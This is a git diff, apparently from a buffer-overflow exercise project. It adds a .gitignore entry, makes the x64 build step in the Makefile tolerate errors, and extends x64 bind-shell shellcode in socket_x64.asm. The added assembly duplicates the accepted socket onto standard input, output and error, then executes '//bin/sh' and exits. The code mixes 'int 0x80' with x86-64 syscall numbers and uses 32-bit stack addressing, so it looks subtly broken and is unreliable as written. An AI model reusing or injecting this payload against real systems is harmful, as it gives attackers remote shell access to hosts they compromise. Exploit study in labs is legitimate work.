diff options
| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | Makefile | 2 | ||||
| -rw-r--r-- | shellcode/socket_x64.asm | 32 |
3 files changed, 34 insertions, 1 deletions
@@ -1,3 +1,4 @@ +*.swp *.o overflow overflow_x64 @@ -31,7 +31,7 @@ disable-prot: %.o : %.c $(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $< - $(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $< + -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $< ln -s $< $@ clean: diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm index 65238e3..131fefa 100644 --- a/shellcode/socket_x64.asm +++ b/shellcode/socket_x64.asm @@ -39,3 +39,35 @@ mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in) mov al,0x2B ; accept() syscall int 0x80 +; dup2() +xor rcx,rcx +mov cl,0x3 ; loop count +dupes: +xor rsi,rsi +dec cl ; loop var +mov rsi,rcx ; loop var -> newfd +xor rax,rax +mov al,0x21 ; dup2() syscall +int 0x80 +inc cl +loop dupes + +; exec +mov rax,0x68732f6e69622f2f ; string 'hs/nib//' +push rax ; push the string onto the stack +mov rdi,rsp ; arg1 = pointer to string +xor rax,rax +push rax ; arg2 = null +mov rsi,rsp +push rax ; arg3 = null +mov rdx,rsp +mov byte [esp + 8],al ; null-terminate the string +mov al,0x3b ; exec() syscall +int 0x80 + +; exit() +xor rax,rax +xor rdi,rdi +mov dil,0x42 ; return code (66d) +mov al,0x3c ; exit() syscall +int 0x80 |